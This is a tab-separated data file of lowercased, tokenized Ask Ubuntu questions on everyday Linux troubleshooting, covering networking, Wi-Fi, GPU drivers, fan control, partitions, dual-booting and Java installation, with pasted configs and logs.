445205	what is the significance of the `` network '' option in /etc/network/interfaces ?	entering in : network 10.168.1.1 in /etc/network/interfaces allows computers on other subnets to ping / ssh this machine with a static ip but removing that line causes it to fail unless you 're on the same subnet . the `` network '' property is supposed to be optional ( ip , netmask and gateway should be enough and is on other os ' ) so why did ubuntu require it ? network network_address network address ( dotted quad ) required for 2.0.x kernels http : //manpages.ubuntu.com/manpages/hardy/man5/interfaces.5.html in centos it 's actually deprecated : network= < address > , where < address > is the network address . this directive is deprecated . http : //www.centos.org/docs/rhel-rg-en-3/s1-networkscripts-interfaces.html i 've googled and they should all be automatically calculated . thank you for your time , matthew
445214	imwheel bug , scrolling does n't work in terminal	i 'm using 'imwheel ' on ubuntu to increase scrolling speed of my mouse wheel . here is the configuration file : '' . * '' none , up , up , 3 none , down , down , 3 while it works fine in browsing , it does n't work at all in terminal . this is what i get when i try to use the mouse wheel to scroll : if anybody got any suggestions or comments , please , let me know . thank you . answer found : http : //askubuntu.com/a/416156/263688
445215	changing .bashrc to allow a call to `` android '' from any directory	i can successfully do the following command in the directory listed kn @ mrcomp : ~/.android_os/adt-bundle-linux/sdk/tools $ android list targets available android targets : -- -- -- -- -- id : 1 or `` android-19 '' name : android 4.4.2 type : platform api level : 19 revision : 3 skins : hvga , wsvga , wxga800 , wvga854 , wvga800 ( default ) , wxga720 , wqvga432 , qvga , wqvga400 , wxga800-7in tag/abis : default/armeabi-v7a i have been following an instructional document which wanted me to edit my .bash_profile to include export path= '' . : ~/.android_os/adt-bundle-linux/sdk/platform-tools : ~/.android_os/adt-bundle-linux/sdk/tools : $ path '' but this does not work ( i have opened a new terminal and tried ) . i also add that to my .bashrc file . is there anything thing else i can do to allow 'android ' to be called from anywhere ?
445217	only ubuntu ca n't find a wired connection on a multiboot system	i have a multiboot system ( all linux ) and the computer has a wired connection . ubuntu tells me i have no connection , but the other oses connect fine . under network , ubuntu shows a wired connection , and at first it said the cable was unplugged but now it says the connection is not managed . on the panel it shows the wireless icon with no activity . when i look at settings on the upper right of the panel , edit connections is now gone . do n't know what happened ; i installed it some time ago and i have n't touched anything to do with connections .
445224	stop ubuntu asking for password to mount second drive	whenever i turn on my machine and browse to the second hard disk in nautilus it asks me to authenticate to mount the drive . i can find guides on how to turn on this behavior , but not to de-activate it , and ca n't seem to follow the steps backwards . the disk is automounted and below is a screenshot , please let me know what other information you need
445226	i ca n't reboot ubuntu 12.04.4 after first start-up	hi i am having a problem with ubuntu12.04.4 i replaced my windows xp os with ubuntu and the first time i rebooted it , the computer worked fine . i had to close the computer unexpectedly when it locked up while i was searching for some pictures . when i rebooted the computer it started to reboot and then went to a command line reading ( busybox v.18.5 ( ubuntu 1:1.18.5-1ubuntu4.1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) i do n't know what i should do to get the os back on track . can you help me ? les
445227	where are the ubuntu images for arm ?	i ca n't find arm images for the latest ubuntu release for an armv7 device undeer http : //cdimage.ubuntu.com . in this guide there is a link that does n't work anymore and there is a suggestion to switch to ubuntu touch , but i 'm not interested in ubuntu touch , i want ubuntu on my arm device , otherwise i will switch to other gnu/linux distributions . is the support for arm discontinued ?
445231	thinkpad twist fan always on	my thinkpad twist 's fan runs really loud always , it seems to be temperature independent . i 've tried thinkfan , but it does n't work ( i also read that newer thinkpads do n't work with thinkfan ) . the fan ran fine under the preinstalled windows . i 'm currently running ubuntu 14.04 , but the problem was also there in 13.10 .
445232	preparing to install has been running for 8 hours how long should i wait	running install on windows xp with dvd . at start up choosing install alongside existing os causes preparing to install ubuntu to run for 10 hours with no results or progress . should it take that long ?
445234	how to install oracle java 7 jdk in lubuntu 13.10	i have tried everything and i still have n't found a way to install oracle 's java development kit 7 in lubuntu 13.10 . i am new to linux . is there an easy way to install it that works with lubuntu 13.10 and allows me to execute .jar files ? and after it is installed , how to i set it up so it can execute .jar files ?
445237	setting up ubuntu server 12.04 with ssd/hdds questions	i am setting up ubuntu server 12.04 lts . i am using 120gb ssd for os and 3x4tb in raid 5 ( software raid 5 ) here are my partitions that i configured during the initial installation : / , /boot , swap on ssd , and /home on raid 5 i did it like this so i can use the ssd only for ssd , nothing else . and i want all of my data to be stored on the raid 5 hdd . my question is , when creating a directory to be shared through samba , do those directories have to be made under /home folder ? in other words , if i create a directory such as `` /datastorage/video '' , instead of `` /home/datastorage/video '' , and i put all my movie files there , will those movie files be stored on the raid 5 hdds ? basically i just want to know if `` /home '' partition is the same as `` /home '' folder . thanks a lot guys . i appreciate the help .
445239	is it possible to highlight a text and to use a keyboard shortcut ?	in order to install something usually have to run some commands . in order to make it quicker , could i highlight some command text on the internet i want to run in terminal , then press a keyboard shortcut and run it ?
445240	missing phy0 wifi driver ?	i was trying to install ubuntu 14 beta 2 on my new laptop -- a lenovo yoga pro 2 -- and i could n't use the wireless . so , i used rfkill list all , and got the result : 0 : ideapad_wlan : wireless lan soft blocked : yes hard blocked : yes 1 : ideapad_bluetooth : bluetooth soft blocked : yes hard blocked : yes 2 : hci0 : buetooth soft blocked : yes hard blocked : no however when i booted from the usb stick i had just installed from running rfkill list all output : 0 : ideapad_wlan : wireless lan soft blocked : yes hard blocked : yes 1 : ideapad_bluetooth : bluetooth soft blocked : yes hard blocked : yes 2 : phy0 : wireless lan soft blocked : yes hard blocked : no 3 : hci0 : buetooth soft blocked : yes hard blocked : no using sudo modprobe -r ideapad_laptop & & sudo rfkill unblock all got the wireless working . and i ca n't figure out why phy0 is n't in the install there , how to load it in , or otherwise get the wireless working .
445242	ubuntu 13.10 - windows jump from monitor when switching workspace	i have installed ubuntu 13.10 and i have 2 monitors connected . sometimes ( i dont know the exact conditions ) when i switch between workspaces , and then go back , i see that the windows have all moved to one of the monitors , forgetting where they were before . why is this happening ?
445244	case fan runs at 100 % after `` sensors -s ''	on ubuntu 14.04 , i created the following /etc/sensors3.conf and applied it with sensors -s. the output of sensors is now correct , but suddenly the case fan started running at 100 % and i ca n't get it to stop ( other than turning off the machine ) . there are only 3 fans in the machine : the case , the psu and the cpu . can the sensor config cause the fan controller to misunderstand component temperatures ? i did n't use command fancontrol at all . how do i get the fan back to normal ? # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # chip `` it8728-isa-0a30 '' # # # # # # # # # fans label fan1 `` cpu-fan '' set fan1_min 1000 label fan2 `` system fan 1 '' set fan2_min 450 ignore fan3 # '' system fan 2 '' set fan3_min 450 ignore fan4 ignore fan5 # '' chassis fan '' # # # # # # # # # # # # # # # # # temperatures label temp1 `` cpu chip temperature '' set temp1_min 10 set temp1_max 60 set temp1_offset 55 ignore temp2 # '' unknown '' label temp3 `` system temperature '' set temp3_min 10 set temp3_max 55 set temp3_offset 50 # # # # # # # # # # # # # voltages label in0 `` vtt '' set in0_min 1.020 set in0_max 1.080 label in1 `` +3.3v '' set in1_min 3.135 set in1_max 3.465 compute in1 1.635* @ , @ /1.635 label in2 `` +12v '' set in2_min 11.400 set in2_max 12.600 compute in2 6.0* @ , @ /6.0 label in3 `` +5v '' set in3_min 4.750 set in3_max 5.250 compute in3 2.5* @ , @ /2.5 label in4 `` vaxg igd '' set in4_min 0.800 set in4_max 1.000 label in5 `` cpu vcore '' set in5_min 0.750 set in5_max 1.150 label in6 `` dram voltage '' set in6_min 1.450 set in6_max 1.550 label in7 `` 3.3 vsb '' set in7_min 3.150 set in7_max 3.450 label in8 `` vbat '' set in0_min 2.700 set in0_max 3.300 # other sensor readings label intrusion0 `` chassis open '' set intrusion0_alarm 0 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # chip `` coretemp-* '' label temp1 `` cpu chip temperature '' label temp2 `` cpu core 1 temperature '' label temp3 `` cpu core 2 temperature '' # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # chip `` pkg-* '' label temp1 `` acpi thermal cpu '' # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # chip `` acpitz-virtual-0 '' label temp1 `` acpi thermal zone 0 temp1 '' label temp2 `` acpi thermal zone 0 temp2 '' # # # # # # # # # # # # # # # # # # # # # #
445245	how do i enable fancy apt colours and progress bars ?	i 've heard that apt has some a fancy colour and progress bar feature , but that i have to manually enable it . how do i do this ?
445250	need help getting optirun to work	i have been searching for a few weeks now ( must have spent 30+ hours ) and can not get bumblebee to run for the life of me . here 's what i do : run optirun firefox : and here 's my syslog and xorg log : systlog : http : //pastebin.com/pedg7jjt [ 1057.427 ] x.org x server 1.14.5 release date : 2013-12-12 [ 1057.427 ] x protocol version 11 , revision 0 [ 1057.427 ] build operating system : linux 3.2.0-37-generic x86_64 ubuntu [ 1057.427 ] current operating system : linux jaskarn-0 3.11.0-19-generic # 33-ubuntu smp tue mar 11 18:48:34 utc 2014 x86_64 [ 1057.427 ] kernel command line : boot_image=/boot/vmlinuz-3.11.0-19-generic.efi.signed root=uuid=8c20a7b9-dc52-47a2-943f-007099490d6f ro quiet splash vt.handoff=7 [ 1057.427 ] build date : 17 december 2013 10:06:15am [ 1057.427 ] xorg-server 2:1.14.5-1ubuntu2~saucy1 ( for technical support please see http : //www.ubuntu.com/support ) [ 1057.427 ] current version of pixman : 0.30.2 [ 1057.427 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 1057.427 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 1057.427 ] ( == ) log file : `` /var/log/xorg.8.log '' , time : tue apr 8 20:20:08 2014 [ 1057.428 ] ( ++ ) using config file : `` /etc/bumblebee/xorg.conf.nvidia '' [ 1057.428 ] ( ++ ) using config directory : `` /etc/bumblebee/xorg.conf.d '' [ 1057.428 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 1057.428 ] ( == ) serverlayout `` layout0 '' [ 1057.428 ] ( == ) no screen section available . using defaults . [ 1057.428 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 1057.428 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 1057.429 ] ( == ) no device specified for screen `` default screen section '' . using the first device section listed . [ 1057.429 ] ( ** ) | | -- > device `` discretenvidia '' [ 1057.429 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . [ 1057.429 ] ( ** ) option `` autoadddevices '' `` false '' [ 1057.429 ] ( ** ) option `` autoaddgpu '' `` false '' [ 1057.429 ] ( ** ) not automatically adding devices [ 1057.429 ] ( == ) automatically enabling devices [ 1057.429 ] ( ** ) not automatically adding gpu devices [ 1057.429 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 1057.429 ] entry deleted from font path . [ 1057.429 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 1057.429 ] entry deleted from font path . [ 1057.429 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 1057.429 ] entry deleted from font path . [ 1057.429 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 1057.429 ] entry deleted from font path . [ 1057.429 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 1057.429 ] entry deleted from font path . [ 1057.429 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 1057.429 ] ( ++ ) modulepath set to `` /usr/lib/nvidia-319-updates/xorg , /usr/lib/xorg/modules '' [ 1057.429 ] ( == ) | -- > input device `` < default pointer > '' [ 1057.429 ] ( == ) | -- > input device `` < default keyboard > '' [ 1057.429 ] ( == ) the core pointer device was n't specified explicitly in the layout . using the default mouse configuration . [ 1057.429 ] ( == ) the core keyboard device was n't specified explicitly in the layout . using the default keyboard configuration . [ 1057.429 ] ( ii ) loader magic : 0x7f848db04d20 [ 1057.429 ] ( ii ) module abi versions : [ 1057.429 ] x.org ansi c emulation : 0.4 [ 1057.429 ] x.org video driver : 14.1 [ 1057.429 ] x.org xinput driver : 19.1 [ 1057.429 ] x.org server extension : 7.0 [ 1057.430 ] ( ii ) xfree86 : adding drm device ( /dev/dri/card0 ) [ 1057.430 ] setversion 1.4 failed [ 1057.430 ] ( ii ) config/udev : ignoring already known drm device ( /dev/dri/card0 ) [ 1057.430 ] ( ii ) xfree86 : adding drm device ( /dev/dri/card1 ) [ 1057.432 ] ( -- ) pci : * ( 0:4:0:0 ) 10de:0fe4:1028:05fa rev 161 , mem @ 0xe2000000/16777216 , 0xd0000000/268435456 , 0xe0000000/33554432 , i/o @ 0x00003000/128 [ 1057.432 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 1057.432 ] initializing built-in extension generic event extension [ 1057.432 ] initializing built-in extension shape [ 1057.432 ] initializing built-in extension mit-shm [ 1057.433 ] initializing built-in extension xinputextension [ 1057.433 ] initializing built-in extension xtest [ 1057.433 ] initializing built-in extension big-requests [ 1057.433 ] initializing built-in extension sync [ 1057.433 ] initializing built-in extension xkeyboard [ 1057.433 ] initializing built-in extension xc-misc [ 1057.433 ] initializing built-in extension security [ 1057.433 ] initializing built-in extension xinerama [ 1057.433 ] initializing built-in extension xfixes [ 1057.433 ] initializing built-in extension render [ 1057.433 ] initializing built-in extension randr [ 1057.433 ] initializing built-in extension composite [ 1057.433 ] initializing built-in extension damage [ 1057.433 ] initializing built-in extension mit-screen-saver [ 1057.433 ] initializing built-in extension double-buffer [ 1057.433 ] initializing built-in extension record [ 1057.433 ] initializing built-in extension dpms [ 1057.433 ] initializing built-in extension x-resource [ 1057.433 ] initializing built-in extension xvideo [ 1057.433 ] initializing built-in extension xvideo-motioncompensation [ 1057.433 ] initializing built-in extension selinux [ 1057.433 ] initializing built-in extension xfree86-vidmodeextension [ 1057.433 ] initializing built-in extension xfree86-dga [ 1057.433 ] initializing built-in extension xfree86-dri [ 1057.433 ] initializing built-in extension dri2 [ 1057.433 ] ( ii ) `` glx '' will be loaded by default . [ 1057.433 ] ( ww ) `` xmir '' is not to be loaded by default . skipping . [ 1057.433 ] ( ii ) loadmodule : `` dri2 '' [ 1057.433 ] ( ii ) module `` dri2 '' already built-in [ 1057.433 ] ( ii ) loadmodule : `` glamoregl '' [ 1057.434 ] ( ii ) loading /usr/lib/xorg/modules/libglamoregl.so [ 1057.451 ] ( ii ) module glamoregl : vendor= '' x.org foundation '' [ 1057.451 ] compiled for 1.14.3 , module version = 0.5.1 [ 1057.451 ] abi class : x.org ansi c emulation , version 0.4 [ 1057.451 ] ( ii ) loadmodule : `` glx '' [ 1057.451 ] ( ii ) loading /usr/lib/nvidia-319-updates/xorg/libglx.so [ 1057.472 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 1057.472 ] compiled for 4.0.2 , module version = 1.0.0 [ 1057.472 ] module class : x.org server extension [ 1057.472 ] ( ii ) nvidia glx module 319.60 wed sep 25 14:24:11 pdt 2013 [ 1057.472 ] loading extension glx [ 1057.472 ] ( ii ) loadmodule : `` nvidia '' [ 1057.473 ] ( ii ) loading /usr/lib/nvidia-319-updates/xorg/nvidia_drv.so [ 1057.475 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 1057.475 ] compiled for 4.0.2 , module version = 1.0.0 [ 1057.475 ] module class : x.org video driver [ 1057.475 ] ( ii ) loadmodule : `` mouse '' [ 1057.475 ] ( ii ) loading /usr/lib/xorg/modules/input/mouse_drv.so [ 1057.476 ] ( ii ) module mouse : vendor= '' x.org foundation '' [ 1057.476 ] compiled for 1.14.1 , module version = 1.7.2 [ 1057.476 ] module class : x.org xinput driver [ 1057.476 ] abi class : x.org xinput driver , version 19.1 [ 1057.476 ] ( ii ) loadmodule : `` kbd '' [ 1057.476 ] ( ww ) warning , could n't open module kbd [ 1057.476 ] ( ii ) unloadmodule : `` kbd '' [ 1057.476 ] ( ii ) unloading kbd [ 1057.476 ] ( ee ) failed to load module `` kbd '' ( module does not exist , 0 ) [ 1057.476 ] ( ii ) nvidia dlloader x driver 319.60 wed sep 25 14:04:14 pdt 2013 [ 1057.476 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 1057.476 ] ( -- ) using vt number 7 [ 1057.476 ] ( ii ) loading sub module `` fb '' [ 1057.476 ] ( ii ) loadmodule : `` fb '' [ 1057.476 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 1057.477 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 1057.477 ] compiled for 1.14.5 , module version = 1.0.0 [ 1057.477 ] abi class : x.org ansi c emulation , version 0.4 [ 1057.477 ] ( ww ) unresolved symbol : fbgetgcprivatekey [ 1057.477 ] ( ii ) loading sub module `` wfb '' [ 1057.477 ] ( ii ) loadmodule : `` wfb '' [ 1057.477 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 1057.477 ] ( ii ) module wfb : vendor= '' x.org foundation '' [ 1057.477 ] compiled for 1.14.5 , module version = 1.0.0 [ 1057.477 ] abi class : x.org ansi c emulation , version 0.4 [ 1057.477 ] ( ii ) loading sub module `` shadow '' [ 1057.477 ] ( ii ) loadmodule : `` shadow '' [ 1057.477 ] ( ii ) loading /usr/lib/xorg/modules/libshadow.so [ 1057.478 ] ( ii ) module shadow : vendor= '' x.org foundation '' [ 1057.478 ] compiled for 1.14.5 , module version = 1.1.0 [ 1057.478 ] abi class : x.org ansi c emulation , version 0.4 [ 1057.478 ] ( ii ) loading sub module `` ramdac '' [ 1057.478 ] ( ii ) loadmodule : `` ramdac '' [ 1057.478 ] ( ii ) module `` ramdac '' already built-in [ 1057.478 ] ( ii ) nvidia ( 0 ) : creating default display subsection in screen section `` default screen section '' for depth/fbbpp 24/32 [ 1057.478 ] ( == ) nvidia ( 0 ) : depth 24 , ( == ) framebuffer bpp 32 [ 1057.478 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 1057.478 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 1057.478 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 1057.478 ] ( ** ) nvidia ( 0 ) : option `` nologo '' `` true '' [ 1057.478 ] ( ** ) nvidia ( 0 ) : option `` probeallgpus '' `` false '' [ 1057.478 ] ( ** ) nvidia ( 0 ) : option `` useedid '' `` false '' [ 1057.478 ] ( ** ) nvidia ( 0 ) : option `` usedisplaydevice '' `` none '' [ 1057.478 ] ( ** ) nvidia ( 0 ) : enabling 2d acceleration [ 1057.478 ] ( ** ) nvidia ( 0 ) : ignoring edids [ 1057.478 ] ( ** ) nvidia ( 0 ) : option `` usedisplaydevice '' set to `` none '' ; enabling noscanout [ 1057.478 ] ( ** ) nvidia ( 0 ) : mode [ 1057.486 ] ( ee ) nvidia ( 0 ) : failed to initialize the nvidia gpu at pci:4:0:0 . please [ 1057.486 ] ( ee ) nvidia ( 0 ) : check your system 's kernel log for additional error [ 1057.486 ] ( ee ) nvidia ( 0 ) : messages and refer to chapter 8 : common problems in the [ 1057.486 ] ( ee ) nvidia ( 0 ) : readme for additional information . [ 1057.486 ] ( ee ) nvidia ( 0 ) : failed to initialize the nvidia graphics device ! [ 1057.486 ] ( ee ) nvidia ( 0 ) : failing initialization of x screen 0 [ 1057.486 ] ( ii ) unloadmodule : `` nvidia '' [ 1057.486 ] ( ii ) unloadsubmodule : `` shadow '' [ 1057.486 ] ( ii ) unloadsubmodule : `` wfb '' [ 1057.487 ] ( ii ) unloadsubmodule : `` fb '' [ 1057.487 ] ( ee ) screen ( s ) found , but none have a usable configuration . [ 1057.487 ] ( ee ) fatal server error : [ 1057.487 ] ( ee ) no screens found ( ee ) [ 1057.487 ] ( ee ) please consult the the x.org foundation support at http : //wiki.x.org for help . [ 1057.487 ] ( ee ) please also check the log file at `` /var/log/xorg.8.log '' for additional information . [ 1057.487 ] ( ee ) [ 1057.487 ] ( ee ) server terminated with error ( 1 ) . closing log file . and heres my bumblebee.conf : # configuration file for bumblebee . values should **not** be put between quotes # # server options . any change made in this section will need a server restart # to take effect . [ bumblebeed ] # the secondary xorg server display number virtualdisplay=:8 # should the unused xorg server be kept running ? set this to true if waiting # for x to be ready is too long and do n't need power management at all . keepunusedxserver=false # the name of the bumbleblee server group name ( gid name ) servergroup=bumblebee # card power state at exit . set to false if the card shoud be on when bumblebee # server exits . turncardoffatexit=false # the default behavior of '-f ' option on optirun . if set to `` true '' , '-f ' will # be ignored . noecomodeoverride=false # the driver used by bumblebee server . if this value is not set ( or empty ) , # auto-detection is performed . the available drivers are nvidia and nouveau # ( see also the driver-specific sections below ) driver=nvidia # directory with a dummy config file to pass as a -configdir to secondary x xorgconfdir=/etc/bumblebee/xorg.conf.d # # client options . will take effect on the next optirun executed . [ optirun ] # acceleration/ rendering bridge , possible values are auto , virtualgl and # primus . bridge=auto # the method used for virtualgl to transport frames between x servers . # possible values are proxy , jpeg , rgb , xv and yuv . vgltransport=proxy # list of paths which are searched for the primus libgl.so.1 when using # the primus bridge primuslibrarypath=/usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus # should the program run under optirun even if bumblebee server or nvidia card # is not available ? allowfallbacktoigc=false # driver-specific settings are grouped under [ driver-name ] . the sections are # parsed if the driver setting in [ bumblebeed ] is set to name ( or if auto- # detection resolves to name ) . # pmmethod : method to use for saving power by disabling the nvidia card , valid # values are : auto - automatically detect which pm method to use # bbswitch - new in bb 3 , recommended if available # switcheroo - vga_switcheroo method , use at your own risk # none - disable pm completely # https : //github.com/bumblebee-project/bumblebee/wiki/comparison-of-pm-methods # # section with nvidia driver specific options , only parsed if driver=nvidia [ driver-nvidia ] # module name to load , defaults to driver if empty or unset kerneldriver=nvidia-319-updates pmmethod=auto # colon-separated path to the nvidia libraries librarypath=/usr/lib/nvidia-319-updates : /usr/lib32/nvidia-319-updates # comma-separated path of the directory containing nvidia_drv.so and the # default xorg modules path xorgmodulepath=/usr/lib/nvidia-319-updates/xorg , /usr/lib/xorg/modules xorgconffile=/etc/bumblebee/xorg.conf.nvidia # # section with nouveau driver specific options , only parsed if driver=nouveau [ driver-nouveau ] kerneldriver=nouveau pmmethod=auto xorgconffile=/etc/bumblebee/xorg.conf.nouveau honestly i cant figure out how to get it working for the life of me and really need help !
445257	if i upgrade to ubuntu 14.04 , will it replace openoffice with libreoffice ?	please do n't tell me that i should just use libreoffice , because i really like/want/need openoffice 3.4.1 , and not even version 4.0+ . i was new to ubuntu , so it took a while to get libreoffice properly uninstalled ( i am still not sure how good i did ) and openoffice 3.4.1 installed . i have never upgraded a distribution before , but i was told that it is pretty easy to do , but will it replace ( completely remove/reset ) all of my programs and configurations ? or , will it just ignore openoffice and install libreoffice alongside it ( probably causing issues ) ? is there a way to keep it from installing libreoffice , if it wo n't do it on its own ? if i ca n't , i would really appreciate it if someone would give me some good instructions to completely remove libreoffice and install openoffice 3.4.1 ? just so you know , since it seems that the instructions are very different , i am using a 64-bit machine . p. s. i am only 13 , but i now have a very good understanding of linux , especially ubuntu , so feel free to use full technical descriptions and instructions , although simplicity is appreciated !
445258	e17 installation and unmet dependencies	every which way i try to correct unmet dependencies it gives me some long error . trying to install packages i get evas-loaders : depends : libefl ( > = 201312241217 ) but it is not going to be installed libedbus1 : depends : libefl ( > = 201312241217 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . if i try to open software-proporties-gtk its a grey icon that can not be opened . trying synaptic package manager to fix broken packages evas-loaders/libedbus1 it says failed to fetch http : //packages.enlightenment.org/ubuntu/dists/jaunty/release.gpg something wicked happened resolving 'packages.enlightenment . **org : http ' ( -5 - no address associated with hostname ) and another thirty something like that .
445260	can not get the internet via wired or wireless connection trialling ubuntu 12.04	as support for windows xp has expired i am trialling using ubuntu 12.04 on my hp compaq nx6125 but can not get either a wired or wireless connection ( has inbuilt wireless and both wired and wireless work fine on windows xp ) . i have tried manually configuring with a static address as per the instructions on pages 41-42 in the `` getting started with ubuntu 12.04 - second edition '' found online ( as found on http : //ubuntu-manual.org/downloads ) for a wired connection but it 's not working . entering my ssid and password for the wireless connection yields no results either . i am pretty much computer illiterate so would appreciate having my hand held with any assistance . many thanks .
445262	getting sound to work on windows 7 in a kvm on ubuntu 13.10	i rebuilt my system from scratch , and decided to install windows as a guest in kvm . it installed fine , but i can not get sound working on any of the configs [ ac97 - sb16 ] . i read most of the web pages and referred to previous version of ubuntu . i have modified /etc/libvirt/qemu.conf with vnc_allow_host_audio=1 user='myuser' group='myuser' and made sure that myuser was a member of audio , pulse and pulse-access ( maybe overkill , but just trying to get it to work ) . any ideas ?
445265	can i merge these partitions or will it break my chromebook ?	ok i am a linux beginner and i need some serious help . product info : acer c7 chromebook with chromeos and xubuntu 12.04 ( i think ) dual booted using 'crouton ' . my problem is that my main/root partition is too small . this is where all of my packages get installed and it 's always on the brink of being out of space . i need to install something big on it or find a way to install packages to my larger partition , but from what i 've read that 's not easy or practical . so i 've been doing a lot of reading on this site about merging/resizing partitions and i ca n't tell if this will work for me or not . i do n't know what a primary or logical partition means . i 've taken some screenshots of my lsblk and parted -l results , and how my partitions show in gparted . i need my 300 gb partition to be merged in with my `` / '' directory if possible ... so can i merge my partitions # 6 and # 7 or are they incompatible since one is kernel unformatted and the other is ext4 ? can i merge # 7 and # 1 ? ... # 1 , 6 and 7 ? ugh . help please .
445268	activate tp-bat-balance	i have a t400 with an ultrabay battery . how do i get this to work ? i want to balance the batteries discharge . i am coming from windows so i don not know much about linux . any help is greatly appreciated . thanks .
445269	how do i remove a color from the gtk scale widget ?	i have included a link below . i am making changes to the ubuntu to rid myself of the all the orange , but it sticks around like the herp . anyone have any experience with this ? you will notice the string of orange running in the scale widget .
445271	does kuaipan cloud service provide encryption and how does it manage privacy ?	looking for an alternative to ubuntuone , i found that the official chinese distro , ubuntu kylin , has announced a cloud service from kingsoft kuaipan , with its own `` customed app '' . this sync client is only partially translated into english , but it was quite easy to get 1tb extra : 512gb installing their apk in my android phone ( which i uninstalled as soon as i got the extra storage ) and 512gb binding it with wechat ( a service i do n't use anyhow ) . it is no doubt a generous amount of free space which derives mainly from a cloud storage war in china . apart from a slight memory leak , i must acknowledge how well this service integrates in unity . a screenshot of the kuaipan folder in nautilus ( note the ubuntu logo ) : provided that canonical somehow endorses this service , i can imagine that it is reliable at least to some extent . my natural question is to what degree ? of course , if i were paranoid , i would n't share any personal file on any server beyond my sight . however , i 'd like to know if kuaipan provides end-to-end encryption ; and how this service handles storage and files ( i.e . if they have a âmaster keyâ to see/open them ) in case they do n't offer a secure connection , please let me know if there is a way to take advantage of this service , for instance , using it as a backup protected with password .
445274	how do i copy contents of a file and concatenate it into a new file ?	i have to make new files that contain the original file contents twice and then concatenate it line by line . for example : file 1 : abcdabcd abcdabcd to new file 1 : abcdabcd abcdabcd abcdabcd abcdabcd edit : i was able to get an answer to this question , however i was informed that this was the wrong place to post it . thank you for the help and sorry for the incorrect location for posting it .
445276	java apps consume 200 % my cpu after cloning image in another computer	yesterday i cloned an image of linux from a core 2 duo to a core i5 laptop . everything works as expected except for jvm . i 've installed in my machine the openjdk , java 8 ( jdk jre ) and java 7 ( jdk jre ) . all of them consume a lot of resources ( cpu ) when i run some ide or some code . i notice this because the fan makes noise and even playing casual games this machine is pretty silent . i checked the jvm flags , i added more resources for heap and some minor changes , i even i tried removing all flags , any change works ... i checked the swap partition and it 's ok . the jvm config is the same in my second machine as it is in this machine . what can i do to fix it ? i appreciate any help , thanks so much ! !
445278	booting paravirtualized kernel on bare hardware	i been reading dmesg and i found the line `` booting paravirtualized kernel on bare hardware `` but i am not using ubuntu in visualization i am using it on my laptop dell n5110 the only os i have on this machine . why is it `` booting paravirtualized kernel on bare hardware '' and what it mean by that ? [ 0.000000 ] booting paravirtualized kernel on bare hardware full dmesg logs
445279	rcmdr : ca n't install eacspir plugin	i 've starting using rcommander ( rcmdr ) but i ca n't understand how to install the plugin eacspir , i can only `` load packages '' but not install a new one ( ca n't find out how.. ) , and eacspir is not in the list . ps : i 'm not at all expert in using ubuntu , nor rcmdr , but thanks in advance for any answers ( need program for statistics class haha.. ) lauriane
445283	how does a newbie install a ubuntu dual boot on an computer with xp ?	i 've been trying to install ubuntu 12.04 ( 32-bit ) as a dual boot on my laptop which is running xp . i managed to create a bootable usb stick , and to boot the laptop from that . when offered the choice between `` try ubuntu '' and `` install ubuntu '' i first chose `` try '' and was able to try out various features of ubuntu . so far , so good . then i started again , this time choosing `` install ubuntu '' , which gave me only two choices : either to replace xp by ubuntu ( which i do n't want ) , or to do `` something else '' , which sent me to a screen which seemed to be requiring me to partition the disc . this is no good for me because i know very little about partitions , and anyway do n't know how to use this rather enigmatic screen . i note that the example on the `` install ubuntu 12.04.4 lts '' web page suggests that ( a ) the `` something else '' choice is for advanced users ( clearly not me ! ) , and ( b ) there should be a 3rd choice : `` install ubuntu alongside windows '' ( which i assume will create a partition for me ) . how do i get access to this third choice ? any other suggestions ? the hard drive is 149 gb , with 103 gb free space
445284	how to start a virtualbox machine via command line ( without gui ) ?	i know that this is possible , but do n't know how ... i am just trying to start a virtualbox vm called ubuservloc from the command line , but without success .
445289	ca n't connect to wifi and adjust brightness after crash	disclaimer : i 'm pretty new to ubuntu ; lenovo g505s ; ubuntu 13.10 i was doing an update via the software updater when suddenly my laptop just hangs . i had to force shutdown ( holding the power button ) . after that , i found out i could n't adjust my brightness ( f11/f12 ) and connect to my wifi . i can only enable networking and create a vpn . i 'm not sure if there are other things i ca n't do after i was forced to shutdown my laptop during an update . i 'm not even sure if this was caused by the force shutdown lol i already tried : sudo rfkill unblock all & & rfkill list all but it outputs nothing and does nothing .
